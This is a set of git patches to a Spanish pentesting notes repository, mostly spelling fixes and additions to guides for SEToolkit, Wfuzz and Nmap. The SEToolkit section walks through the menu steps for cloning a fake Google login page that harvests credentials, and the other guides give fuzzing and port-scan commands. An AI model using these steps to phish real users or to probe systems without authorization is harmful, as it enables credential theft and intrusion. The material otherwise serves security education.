+++ b/Herramientas_y_Scripts/Setoolkit.md
@@ -53,14 +53,14 @@ tendréis que utilizar la herramienta como `root`.
## Ejecución:
-Para ejecutarlo y poder acceder a sus multiples herramientas, simplemente ejecutamos lo siguiente:
+Para ejecutarlo y poder acceder a sus múltiples herramientas, simplemente ejecutamos lo siguiente:
sudo setoolkit

-La interfaz de SET es muy intuitiva, simplemente tendremos que marcar los número del panel en función del tipo de ataque que
-queramos realizar, y tambien, proporciona mucha información mediante en cada uno de sus paneles de opciones guiandote durante todo
+La interfaz de SET es muy intuitiva, simplemente tendremos que marcar el número del panel en función del tipo de ataque que
+queramos realizar, y también, proporciona mucha información mediante en cada uno de sus paneles de opciones guiándote durante todo
el proceso.

@@ -68,23 +68,23 @@ el proceso.
# Crear una página falsa para capturar credenciales:
-En este ejemplo, voy a mostrar como crear mediante la herramienta SEToolkit como crear una página falsa de autentificación de google, tambien
-es posible aplicarlo a infinidad de paginas de registro o de relleno de credenciales, pero para el ejemple utilizaremos una que viene
+En este ejemplo, voy a mostrar como crear mediante la herramienta SEToolkit como crear una página falsa de autentificación de Google, también
+es posible aplicarlo a infinidad de páginas de registro o de relleno de credenciales, pero para el ejemplo usaremos una que viene
predefinida en la herramienta.
-Utilizando estos metedos los civercriminales engañana a sus víctimas haciendose pasar por cualquier tipo de servicio o entidad y de esta
-forma robarles todos los datos posibles, desde nombres o usuarios, hasta cuentas bancarias, números de tarjetas de crédito, contraseñas, etc
-intedependientemente de la longitud o dificultad de la contraseña, ya que simplemente se reporta al atacante cuando se ingresa dicha información.
+Empleando estos metedos, los cibercriminales engañan a sus víctimas haciéndose pasar por cualquier tipo de servicio o entidad y de esta
+forma robarles todos los datos posibles, desde nombres o usuarios, hasta cuentas bancarias, números de tarjetas de crédito, contraseñas, etc,
+interdependientemente de la longitud o dificultad de la contraseña, ya que simplemente se reporta al atacante cuando se ingresa dicha información.
-En primer lugar vamos a comprender como se realiza el ataque:
+En primer lugar, vamos a comprender como se realiza el ataque:
- 1. Primero crearemos mediante `Setoolkit` una página falsa de inició de sesión de google.
- 2. Está página quedara registrada en nuestra `localhost`.
- 3. Finalmente cuando se introduzcan las credenciales en la página, se nos reportaran en la terminal del programa.
+ 1. Primero generaremos mediante `Setoolkit` una página falsa se inició de sesión de Google.
+ 2. Esta página quedará registrada en nuestra `localhost`.
+ 3. Finalmente, cuando se introduzcan las credenciales en la página, se nos reportaran en la terminal del programa.
-Esto es una ejemplo muy simple que voy a mostrar como prueba, se puede realizar este ataque de formas mucho más complejas y dificiles de detectar.
-Recalco que utilizar está herramienta con alguien que no te lo haya autorizado es completamente ilegal y que este artículo està escrito con la
-finalidad de mostrar como actuan los cibercriminales. Dicho esto vamos a ver el ejemplo.
+Esto es un ejemplo muy simple que voy a mostrar como prueba, se puede realizar este ataque de maneras mucho más complejas y difíciles de detectar.
+Recalco que emplear está herramienta con alguien que no te lo haya autorizado es completamente ilegal y que este artículo esta escrito con la
+finalidad de mostrar como actúan los cibercriminales. Dicho esto vamos a ver el ejemplo.
### Crear página de inicio de sesión de Google:
@@ -96,13 +96,13 @@ Ejecutamos la herramienta y seguimos los siguientes pasos:
La herramienta que vamos a utilizar es la `Social-Engienering Attacks` que corresponde al número `1`. Tener en cuenta que los números pueden
-variar en función de la versión ya que periodicamente se incluyen herramientas y funciones. Introducimos `1` y pulsamos `Enter`:
+variar en función de la versión, ya que periódicamente se incluyen herramientas y funciones. Introducimos `1` y pulsamos `Enter`:
1

-Ahora vamos a seleccionar el metodo de ataque `Website Attack Vectors` que me corresponde con el número `2`:
+Ahora vamos a seleccionar el método de ataque `Website Attack Vectors` que me corresponde con el número `2`:
2
@@ -115,15 +115,15 @@ utilizaremos el modo `Credential Harvester Attack Method` que corresponde con el

-Ya lo tenemos casi, solo nos queda especificar que clase de página vamos a mostrar. Como veis tambien nos da la opción `2` que es la de clonar
+Ya lo tenemos casi, solo nos queda especificar que clase de página vamos a mostrar. Como veis también nos da la opción `2` que es la de clonar
algún sitio web y así ajustarse más al tipo de víctima. En nuestro caso vamos a seleccionar la opción `1` que ya nos muestra algunas páginas web
-que la herramienta nos muestra de serie, aśi que seleccionaremos `Web Templates`:
+que la herramienta nos muestra de serie, así que seleccionaremos `Web Templates`:
1

-Vemos como la misma herramienta nos muestra tres opciones predefinidas, `Java`, `Google` y `Twitter`. Vamos utilizar la de `Google` así que marcamos
+Vemos como la misma herramienta nos muestra tres opciones predefinidas, `Java`, `Google` y `Twitter`. Vamos a utilizar la de `Google` así que marcamos
la `2`.

@@ -132,8 +132,8 @@ En caso de preguntarnos si utilizamos NAT se lo indicamos y luego simplemente pr

-La página ya esta completamente funcional, ahora simplemente nos dirigimos a un navegador, en mi caso firefox y para ejecutar la página escribimos
-`localhost` o `127.0.0.1` que es donde se aloja la página de forma predeterminada. Esto podemos cambiralo pero para este tutorial nos sobrará.
+La página ya está completamente funcional, ahora simplemente nos dirigimos a un navegador, en mi caso Firefox y para ejecutar la página escribimos
+`localhost` o `127.0.0.1` que es donde se aloja la página de forma predeterminada. Esto podemos cambiarlo, pero para este tutorial nos sobrará.
Vamos al navegador y abrimos la página:

@@ -145,8 +145,8 @@ Vamos al navegador y abrimos la página:

-Como vemos la página es muy realista, ahora simplemente escribimos unas credenciales (no tienen poque ser validas, el programa nos reportara todo
-lo que se escriba). Para que se vea que esto funciona independientemente de la dificultad de la contraseña, hemos introducido una password con
+Como vemos la página es muy realista, ahora simplemente escribimos unas credenciales (no tienen por qué ser válidas, el programa nos reportara todo
+lo que se escriba). Para que se vea que esto funciona independientemente de la dificultad de la contraseña, hemos introducido un password con
variedad de caracteres.

From 3f3b687e1da13848ac5c6f35397033aa24535c1d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 07:06:08 +0200
Subject: [PATCH 0222/1701] Update Wfuzz.md
---
Herramientas_y_Scripts/Wfuzz.md | 37 +++++++++++++++++++++++++++++++++
1 file changed, 37 insertions(+)
diff --git a/Herramientas_y_Scripts/Wfuzz.md b/Herramientas_y_Scripts/Wfuzz.md
index 5b95dc38ca5..22b6eec9dfe 100644
--- a/Herramientas_y_Scripts/Wfuzz.md
+++ b/Herramientas_y_Scripts/Wfuzz.md
@@ -12,3 +12,40 @@ Una carga útil en Wfuzz es una fuente de datos.
Este concepto simple permite inyectar cualquier entrada en cualquier campo de una solicitud HTTP, lo que permite realizar complejos ataques
de seguridad web en diferentes componentes de la aplicación web, como: parámetros, autenticación, formularios, directorios/archivos, encabezados, etc.
+
+## Diccionarios y Listas de Palabras:
+
+En caso de utilizar Kali Linux o ParroOS suelen tener incluidos el repositorio `wordlists` el cual incluye una variedad de diccionarios o listas de
+palabras de dinstintos tamaños. Este repositorio se encuentra en el direcctorio `/usr/share/wordlists`.
+
+
+
+Para descargar el repositorio con todos los diccionarios simplemente ejecutamos lo sisguiente:
+
+ sudo apt install wordlists
+
+
+## Ejecución Básica:
+
+Una ejecución de línea de comando típica de Wfuzz, que especifica una carga de diccionario y una URL, se ve así:
+
+ wfuzz -w [Ruta del Diccionario] [Url Víctima]
+
+ wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+
+`-w` : Especifica un diccionario (Lista de palabras).
+
+
+
+
+
+
+
+
+
+Podemos ver los siguientes parámetros en la respuesta:
+
+
+
+
+
From c03f4a64c5e62561195810878de978138c709277 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 07:09:13 +0200
Subject: [PATCH 0223/1701] Update Wfuzz.md
---
Herramientas_y_Scripts/Wfuzz.md | 30 ++++++++++++++++++++++--------
1 file changed, 22 insertions(+), 8 deletions(-)
diff --git a/Herramientas_y_Scripts/Wfuzz.md b/Herramientas_y_Scripts/Wfuzz.md
index 22b6eec9dfe..535a7cb12a1 100644
--- a/Herramientas_y_Scripts/Wfuzz.md
+++ b/Herramientas_y_Scripts/Wfuzz.md
@@ -20,6 +20,12 @@ palabras de dinstintos tamaños. Este repositorio se encuentra en el direcctorio

+
+
+
+
+
+
Para descargar el repositorio con todos los diccionarios simplemente ejecutamos lo sisguiente:
sudo apt install wordlists
@@ -34,18 +40,26 @@ Una ejecución de línea de comando típica de Wfuzz, que especifica una carga d
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
`-w` : Especifica un diccionario (Lista de palabras).
-
-
-
-
-
-
-
+

Podemos ver los siguientes parámetros en la respuesta:

-
+La salida de Wfuzz permite analizar las respuestas del servidor web y filtrar los resultados deseados en función del mensaje de respuesta HTTP obtenido, por ejemplo, códigos de respuesta, longitud de respuesta, etc.
+
+Cada línea proporciona la siguiente información:
+
+`ID` : El número de solicitud en el orden en que se realizó.
+
+`Respuesta:` muestra el código de respuesta HTTP.
+
+`Líneas:` Muestra el número de líneas en la respuesta HTTP.
+
+`Palabra:` Muestra el número de palabras en la respuesta HTTP.
+
+`Chars:` Muestra el número de caracteres en la respuesta HTTP.
+
+`Carga útil:` Muestra la carga útil utilizada.
From bd4888e03b78490e87bfc51ffd0e0594992c667d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 07:19:50 +0200
Subject: [PATCH 0224/1701] Update Wfuzz.md
---
Herramientas_y_Scripts/Wfuzz.md | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/Herramientas_y_Scripts/Wfuzz.md b/Herramientas_y_Scripts/Wfuzz.md
index 535a7cb12a1..6c8a69db983 100644
--- a/Herramientas_y_Scripts/Wfuzz.md
+++ b/Herramientas_y_Scripts/Wfuzz.md
@@ -30,6 +30,16 @@ Para descargar el repositorio con todos los diccionarios simplemente ejecutamos
sudo apt install wordlists
+## Optener ayuda:
+
+Use el interruptor `–h` y `–help` para obtener el uso de ayuda básica y avanzada respectivamente.
+
+Wfuzz es un marco completamente modular, puede verificar los módulos disponibles usando el interruptor `-e iterators`:
+
+
+
+Las categorías válidas son: ´cargas útiles´, ´codificadores´, ´iteradores´, ´impresoras´ o ´scripts´.
+
## Ejecución Básica:
@@ -63,3 +73,4 @@ Cada línea proporciona la siguiente información:
`Carga útil:` Muestra la carga útil utilizada.
+
From 9a6093899092f98f91bcf153ff297079bf1b2038 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 08:06:52 +0200
Subject: [PATCH 0225/1701] Update Wfuzz.md
---
Herramientas_y_Scripts/Wfuzz.md | 73 ++++++++++++++++++++++++++++++++-
1 file changed, 71 insertions(+), 2 deletions(-)
diff --git a/Herramientas_y_Scripts/Wfuzz.md b/Herramientas_y_Scripts/Wfuzz.md
index 6c8a69db983..90f1284184c 100644
--- a/Herramientas_y_Scripts/Wfuzz.md
+++ b/Herramientas_y_Scripts/Wfuzz.md
@@ -30,6 +30,26 @@ Para descargar el repositorio con todos los diccionarios simplemente ejecutamos
sudo apt install wordlists
+## Payloads/Cargas Útiles:
+
+Wfuzz se basa en un concepto simple: reemplaza cualquier referencia a la palabra clave FUZZ por el valor de una carga útil determinada. Una `carga útil` más conocida como `payload` en Wfuzz es una fuente de datos de entrada y se especifica meidiante `-z`:
+
+Las cargas útiles disponibles se pueden listar ejecutando:
+
+ wfuzz -e payloads
+
+
+
+Se puede obtener información detallada sobre las cargas útiles ejecutando:
+
+ wfuzz -z help
+
+Este último se puede filtrar usando el parámetro `--slice`:
+
+ wfuzz -z help --slice "dirwalk"
+
+
+
## Optener ayuda:
Use el interruptor `–h` y `–help` para obtener el uso de ayuda básica y avanzada respectivamente.
@@ -39,9 +59,32 @@ Wfuzz es un marco completamente modular, puede verificar los módulos disponible

Las categorías válidas son: ´cargas útiles´, ´codificadores´, ´iteradores´, ´impresoras´ o ´scripts´.
+
+## Filtros:
+
+Filtrar resultados en Wfuzz es primordial:
+
+Los diccionarios grandes pueden generar una gran cantidad de resultados y pueden ahogar fácilmente los resultados válidos legítimos.
+La clasificación de las respuestas HTTP es clave para realizar algunos ataques, por ejemplo, para verificar la presencia de una vulnerabilidad de inyección SQL, debemos distinguir una respuesta legítima de la que genera un error o datos diferentes.
+Wfuzz permite filtrar según el código de respuesta HTTP y la longitud de la información recibida (en forma de palabras, caracteres o líneas). También se pueden utilizar expresiones regulares. Se pueden tomar dos enfoques: mostrar u ocultar los resultados que coinciden con un filtro determinado.
+
+
+## Ocultar respuestas
+
+Los siguientes parámetros de la línea de comandos se pueden usar para ocultar ciertas respuestas HTTP `–hc`, `–hl`, `–hw`, `–hh`.
+
+El comando `--hc` filtra los recursos web desconocidos por el servidor web ( http://en.wikipedia.org/wiki/HTTP_404 ), básicamente suprime las ṕaginas
+que reportar `error 404`:
+
+ wfuzz -w wordlist/general/common.txt --hc 404 http://testphp.vulnweb.com/FUZZ
+
+Se pueden especificar múltiples valores, por ejemplo, la siguiente ejecución de wfuzz agrega los recursos prohibidos al filtro:
+
+ wfuzz -w wordlist/general/common.txt --hc 404,403 http://testphp.vulnweb.com/FUZZ
+Las líneas, palabras o caracteres son útiles cuando buscamos recursos con el mismo código de estado HTTP. Por ejemplo, es un comportamiento común (a veces debido a una configuración incorrecta) que los servidores web devuelvan una página de error personalizada con un código de respuesta 200, esto se conoce como 404 suave.
-## Ejecución Básica:
+# Ejecución Básica:
Una ejecución de línea de comando típica de Wfuzz, que especifica una carga de diccionario y una URL, se ve así:
@@ -71,6 +114,32 @@ Cada línea proporciona la siguiente información:
`Chars:` Muestra el número de caracteres en la respuesta HTTP.
-`Carga útil:` Muestra la carga útil utilizada.
+`Carga útil:` Muestra la carga útil utilizada.
+
+# Ejecución Carga Útil:
+
+Cada palabra clave FUZZ debe tener su carga ùtil (payload) correspondiente. Hay varias formas equivalentes de especificar una `payload`:
+
+### Ejecución Básica:
+
+ wfuzz -w [Ruta del Diccionario] [URL Víctima]
+
+### Ejecución definiendo el valor del Payload:
+
+ wfuzz -z file,wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+
+`-z` : Especifica el valor del parámetro predeterminado del payload.
+
+
+
+
+
+
+
+
+
+
+
+
From a5243e27efd35492e9ead570ff56fbb3cfdcb818 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 08:28:42 +0200
Subject: [PATCH 0226/1701] Update Wfuzz.md
---
Herramientas_y_Scripts/Wfuzz.md | 29 +++++++++++++++++++++--------
1 file changed, 21 insertions(+), 8 deletions(-)
diff --git a/Herramientas_y_Scripts/Wfuzz.md b/Herramientas_y_Scripts/Wfuzz.md
index 90f1284184c..dd50bcf8c3e 100644
--- a/Herramientas_y_Scripts/Wfuzz.md
+++ b/Herramientas_y_Scripts/Wfuzz.md
@@ -16,7 +16,7 @@ de seguridad web en diferentes componentes de la aplicación web, como: parámet
## Diccionarios y Listas de Palabras:
En caso de utilizar Kali Linux o ParroOS suelen tener incluidos el repositorio `wordlists` el cual incluye una variedad de diccionarios o listas de
-palabras de dinstintos tamaños. Este repositorio se encuentra en el direcctorio `/usr/share/wordlists`.
+palabras de distintos tamaños. Este repositorio se encuentra en el directorio `/usr/share/wordlists`.

@@ -26,13 +26,13 @@ palabras de dinstintos tamaños. Este repositorio se encuentra en el direcctorio

-Para descargar el repositorio con todos los diccionarios simplemente ejecutamos lo sisguiente:
+Para descargar el repositorio con todos los diccionarios simplemente ejecutamos lo siguiente:
sudo apt install wordlists
## Payloads/Cargas Útiles:
-Wfuzz se basa en un concepto simple: reemplaza cualquier referencia a la palabra clave FUZZ por el valor de una carga útil determinada. Una `carga útil` más conocida como `payload` en Wfuzz es una fuente de datos de entrada y se especifica meidiante `-z`:
+Wfuzz se basa en un concepto simple: reemplaza cualquier referencia a la palabra clave FUZZ por el valor de una carga útil determinada. Una `carga útil` más conocida como `payload` en Wfuzz es una fuente de datos de entrada y se especifica mediante `-z`:
Las cargas útiles disponibles se pueden listar ejecutando:
@@ -50,7 +50,7 @@ Este último se puede filtrar usando el parámetro `--slice`:

-## Optener ayuda:
+## Obtener ayuda:
Use el interruptor `–h` y `–help` para obtener el uso de ayuda básica y avanzada respectivamente.
@@ -73,7 +73,7 @@ Wfuzz permite filtrar según el código de respuesta HTTP y la longitud de la in
Los siguientes parámetros de la línea de comandos se pueden usar para ocultar ciertas respuestas HTTP `–hc`, `–hl`, `–hw`, `–hh`.
-El comando `--hc` filtra los recursos web desconocidos por el servidor web ( http://en.wikipedia.org/wiki/HTTP_404 ), básicamente suprime las ṕaginas
+El comando `--hc` filtra los recursos web desconocidos por el servidor web ( http://en.wikipedia.org/wiki/HTTP_404 ), básicamente suprime las páginas
que reportar `error 404`:
wfuzz -w wordlist/general/common.txt --hc 404 http://testphp.vulnweb.com/FUZZ
@@ -82,7 +82,9 @@ Se pueden especificar múltiples valores, por ejemplo, la siguiente ejecución d
wfuzz -w wordlist/general/common.txt --hc 404,403 http://testphp.vulnweb.com/FUZZ
-Las líneas, palabras o caracteres son útiles cuando buscamos recursos con el mismo código de estado HTTP. Por ejemplo, es un comportamiento común (a veces debido a una configuración incorrecta) que los servidores web devuelvan una página de error personalizada con un código de respuesta 200, esto se conoce como 404 suave.
+Las líneas, palabras o caracteres son útiles cuando buscamos recursos con el mismo código de estado HTTP.
+
+Por ejemplo, es un comportamiento común (a veces debido a una configuración incorrecta) que los servidores web devuelvan una página de error personalizada con un código de respuesta 200, esto se conoce como `soft 404`.
# Ejecución Básica:
@@ -118,18 +120,29 @@ Cada línea proporciona la siguiente información:
# Ejecución Carga Útil:
-Cada palabra clave FUZZ debe tener su carga ùtil (payload) correspondiente. Hay varias formas equivalentes de especificar una `payload`:
+Cada palabra clave FUZZ debe tener su carga útil (payload) correspondiente. Hay varias formas equivalentes de especificar una `payload`:
### Ejecución Básica:
wfuzz -w [Ruta del Diccionario] [URL Víctima]
+`-w` : Especifica un diccionario (Lista de palabras).
+
### Ejecución definiendo el valor del Payload:
- wfuzz -z file,wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+ wfuzz -z [Ruta del Diccionario] [URL Víctima]
`-z` : Especifica el valor del parámetro predeterminado del payload.
+### Ejecución filtrada omitiendo servicios web desconocidos:
+
+ wfuzz -w [Ruta del Diccionario] --hc 404,403 [URL Víctima]
+
+`-w` : Especifica un diccionario (Lista de palabras).
+
+`--hc` : Omite los resultados HTTP especificados, en este caso las páginas con servicios 404 (servidor no encontrado) y 403 (sin permisos de acceso).
+
+
From 1feb158bc6f802a525752a7c436f88001013f62c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 08:55:24 +0200
Subject: [PATCH 0227/1701] Update Bluetoothctl.md
---
"Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
index 600621b87e3..647f5ef55c7 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
@@ -39,7 +39,7 @@ Para conectarnos con un dispositivo:
connect [Núm. MAC]
-El `número MAC` es el número que corresponde con el dispositivo que se nos muestra en el escaneo.
+El `número MAC` es el número que corresponde con el dispositivo que se nos muestra en el escaneo.
Una vez conectados podemos salir de la shell simplemente escribiendo `exit`.
From 95d673c53f0fc73647f6cd5153a0eed5d1afb29f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 09:01:21 +0200
Subject: [PATCH 0228/1701] Create Nmap.md
---
Herramientas_y_Scripts/Nmap.md | 2 ++
1 file changed, 2 insertions(+)
create mode 100644 Herramientas_y_Scripts/Nmap.md
diff --git a/Herramientas_y_Scripts/Nmap.md b/Herramientas_y_Scripts/Nmap.md
new file mode 100644
index 00000000000..41863d151e1
--- /dev/null
+++ b/Herramientas_y_Scripts/Nmap.md
@@ -0,0 +1,2 @@
+# NMAP
+
From 829f001a3bab933ab2ac7d85ce51807c8ea1cbab Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 09:03:06 +0200
Subject: [PATCH 0229/1701] Update Wfuzz.md
---
Herramientas_y_Scripts/Wfuzz.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/Herramientas_y_Scripts/Wfuzz.md b/Herramientas_y_Scripts/Wfuzz.md
index dd50bcf8c3e..5475f77b78d 100644
--- a/Herramientas_y_Scripts/Wfuzz.md
+++ b/Herramientas_y_Scripts/Wfuzz.md
@@ -141,6 +141,8 @@ Cada palabra clave FUZZ debe tener su carga útil (payload) correspondiente. Hay
`-w` : Especifica un diccionario (Lista de palabras).
`--hc` : Omite los resultados HTTP especificados, en este caso las páginas con servicios 404 (servidor no encontrado) y 403 (sin permisos de acceso).
+
+Se puede encontr mucha más información sobre esta herramienta en su página: [https://wfuzz.readthedocs.io/en/latest/user/getting.html](https://wfuzz.readthedocs.io/en/latest/user/getting.html)
From a80d14692d1c9d844bb3e5bb834e291f0fcc5d7a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 09:22:56 +0200
Subject: [PATCH 0230/1701] Update Fase_de_reconocimiento-HTB.md
---
.../Fase_de_reconocimiento-HTB.md" | 50 +++++++++----------
1 file changed, 23 insertions(+), 27 deletions(-)
diff --git "a/Art\303\255culos/Fase_de_reconocimiento-HTB.md" "b/Art\303\255culos/Fase_de_reconocimiento-HTB.md"
index 6d41e7b2194..133c2f5ff85 100644
--- "a/Art\303\255culos/Fase_de_reconocimiento-HTB.md"
+++ "b/Art\303\255culos/Fase_de_reconocimiento-HTB.md"
@@ -19,9 +19,9 @@
Para verificar la conexión y tener una primera toma de
- contacto utilizaremos el comando 'ping'.
+ contacto utilizaremos el comando `ping`.
- ping [Ip Víctima]
+ ping [Ip Víctima]
Mediante este comando podemos obtener la siguiente
información:
@@ -36,7 +36,7 @@
---
-## NMAP
+## [NMAP](../Herramientas_y_Scripts/Nmap.html)
Tras conocer la máquina a la que nos enfrentamos
pasaremos analizar los protocolos tcp/udp.
@@ -48,54 +48,50 @@
será un análisis de todos los puertos abiertos del
protocolo tcp.
- nmap -p- --open -T5 -v -n [Ip]
+ nmap -p- --open -T5 -v -n [Ip]
- -p- : Escanea todo el rango de puertos.
+`-p-` : Escanea todo el rango de puertos.
- --open : Solo nos mostrará puertos con el estatus
- abierto.
+`--open` : Solo nos mostrará puertos con el estatus abierto.
- -T5 : Controla el tiempo y el rendimiento del
- escaneo donde 1 es el más lento y 5 el
- más rápido.
+`-T5` : Controla el tiempo y el rendimiento del escaneo donde 1 es el más lento y 5 el más rápido.
- -v : Verbose. Recopila los puertos abiertos por
- TCP y los reporta por consola.
-
- -n : Anula la resolución DNS.
+`-v` : Verbose. Recopila los puertos abiertos por TCP y los reporta por consola.
+
+`-n` : Anula la resolución DNS.
Ahora para poder trabajar mejor, exportaremos una lista
- en formato Grepeable al archivo 'allPorts'
+ en formato Grepeable al archivo `allPorts`.
- nmap -p- --open -T5 -v -n [Ip] -oG allPorts
+ nmap -p- --open -T5 -v -n [Ip] -oG allPorts
- -oG : Exportar los resultados en formato grepeable.
+`-oG` : Exportar los resultados en formato grepeable.
- allPorts : Nombre del archivo. Si no existe lo creará.
+`allPorts` : Nombre del archivo. Si no existe lo creará.
De esta manera podremos revisar los puertos que estaban
abiertos en cualquier momento.
---
-## NMAP
+## [NMAP](../Herramientas_y_Scripts/Nmap.html)
-ESCANEO EXHAUSTIVO:
+### ESCANEO EXHAUSTIVO:
Tras conocer los puertos TCP abiertos, realizaremos un
segundo escaneo enfocado en los puertos abiertos para ver
la información que nos reportan y exportarlo en formato
nmap al archivo 'targed'.
- nmap -sC -sV -p[Port1,Port2] -oN targed
+ nmap -sC -sV -p[Port1,Port2] -oN targed
- -sC : Lanza scrips básicos de reconocimiento.
+`-sC` : Lanza scrips básicos de reconocimiento.
- -sV : Localiza la versión y servicio de los puertos definidos.
+`-sV` : Localiza la versión y servicio de los puertos definidos.
- -p : Puertos a escanear. Ej: -p22,80
+`-p` : Puertos a escanear. Ej: -p22,80
- -oN : Reporta los resultados en formato nmap al archivo 'targed'.
+`-oN` : Reporta los resultados en formato nmap al archivo `targed`.
---
@@ -106,9 +102,9 @@ ESCANEO EXHAUSTIVO:
el gestor de contenido de la Ip. Nos reportará
información varia del sistema.
- whatweb http://[Ip]
+ whatweb http://[Ip]
- whatweb http://[Host]
+ whatweb http://[Host]
From a094c234db1ea264d17a80e1e58832abcc27e615 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 09:23:08 +0200
Subject: [PATCH 0231/1701] Update Nmap.md
---
Herramientas_y_Scripts/Nmap.md | 43 ++++++++++++++++++++++++++++++++++
1 file changed, 43 insertions(+)
diff --git a/Herramientas_y_Scripts/Nmap.md b/Herramientas_y_Scripts/Nmap.md
index 41863d151e1..4e5a00bd8cb 100644
--- a/Herramientas_y_Scripts/Nmap.md
+++ b/Herramientas_y_Scripts/Nmap.md
@@ -1,2 +1,45 @@
+
+
# NMAP
+Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos y cuyo desarrollo se encuentra hoy a cargo de una comunidad. Fue creado originalmente para Linux aunque actualmente es multiplataforma. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática, para ello Nmap envía unos paquetes definidos a otros equipos y analiza sus respuestas.
+
+Este software posee varias funciones para sondear redes de computadores, incluyendo detección de equipos, servicios y sistemas operativos. Estas funciones son extensibles mediante el uso de scripts para proveer servicios de detección avanzados, detección de vulnerabilidades y otras aplicaciones. Además, durante un escaneo, es capaz de adaptarse a las condiciones de la red incluyendo latencia y congestión de la misma.
+
+### Escaneo Básico:
+
+ nmap -p- --open -T5 -v -n [Ip]
+
+`-p-` : Escanea todo el rango de puertos.
+
+`--open` : Solo nos mostrará puertos con el estatus abierto.
+
+`-T5` : Controla el tiempo y el rendimiento del escaneo donde 1 es el más lento y 5 el más rápido.
+
+`-v` : Verbose. Recopila los puertos abiertos por TCP y los reporta por consola.
+
+`-n` : Anula la resolución DNS.
+
+
+### Escaneo Básico Guardando los resultados:
+
+ nmap -p- --open -T5 -v -n [Ip] -oG allPorts
+
+`-oG` : Exportar los resultados en formato grepeable.
+
+`allPorts` : Nombre del archivo. Si no existe lo creará.
+
+De esta manera podremos revisar los puertos que estaban abiertos en cualquier momento.
+
+### Escaneo exahustivo de Puertos definidos:
+
+ nmap -sC -sV -p[Port1,Port2] -oN targed
+
+`-sC` : Lanza scrips básicos de reconocimiento.
+
+`-sV` : Localiza la versión y servicio de los puertos definidos.
+
+`-p` : Puertos a escanear. Ej: -p22,80
+
+`-oN` : Reporta los resultados en formato nmap al archivo `targed`.
+
From e22a68f157ed9e08d4d6cc58ad6809f61192c9b5 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 09:24:47 +0200
Subject: [PATCH 0232/1701] Update Nmap.md
---
Herramientas_y_Scripts/Nmap.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Herramientas_y_Scripts/Nmap.md b/Herramientas_y_Scripts/Nmap.md
index 4e5a00bd8cb..6158b10f318 100644
--- a/Herramientas_y_Scripts/Nmap.md
+++ b/Herramientas_y_Scripts/Nmap.md
@@ -8,7 +8,7 @@ Este software posee varias funciones para sondear redes de computadores, incluye
### Escaneo Básico:
- nmap -p- --open -T5 -v -n [Ip]
+ nmap -p- --open -T5 -v -n [Ip]
`-p-` : Escanea todo el rango de puertos.
From c4d284a2728968848492251a579de797b498cc67 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 09:27:30 +0200
Subject: [PATCH 0233/1701] Update index.md
---
index.md | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/index.md b/index.md
index 4756c2af332..4df30929601 100644
--- a/index.md
+++ b/index.md
@@ -28,9 +28,10 @@
## Reporte y reconocimiento:
Herramientas útiles para la fase de reconocimiento, como reportes de SO o recopilación de puertos.
-1.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
-2.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
-3.[mkt](./Herramientas_y_Scripts/mkt.html)
+1.[Nmap](../Herramientas_y_Scripts/Nmap.html)
+2.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
+3.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
+4.[mkt](./Herramientas_y_Scripts/mkt.html)
## Shells:
Herramientas para crear shells inversas.
From 22142388f3bb8307c5ed8f9c042c873aeec389b7 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 9 May 2022 09:28:18 +0200
Subject: [PATCH 0234/1701] Update index.md
---
index.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 4df30929601..32b1a59fb2f 100644
--- a/index.md
+++ b/index.md
@@ -28,7 +28,7 @@
## Reporte y reconocimiento:
Herramientas útiles para la fase de reconocimiento, como reportes de SO o recopilación de puertos.
-1.[Nmap](../Herramientas_y_Scripts/Nmap.html)
+1.[Nmap](../Herramientas_y_Scripts/Nmap.html)
2.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
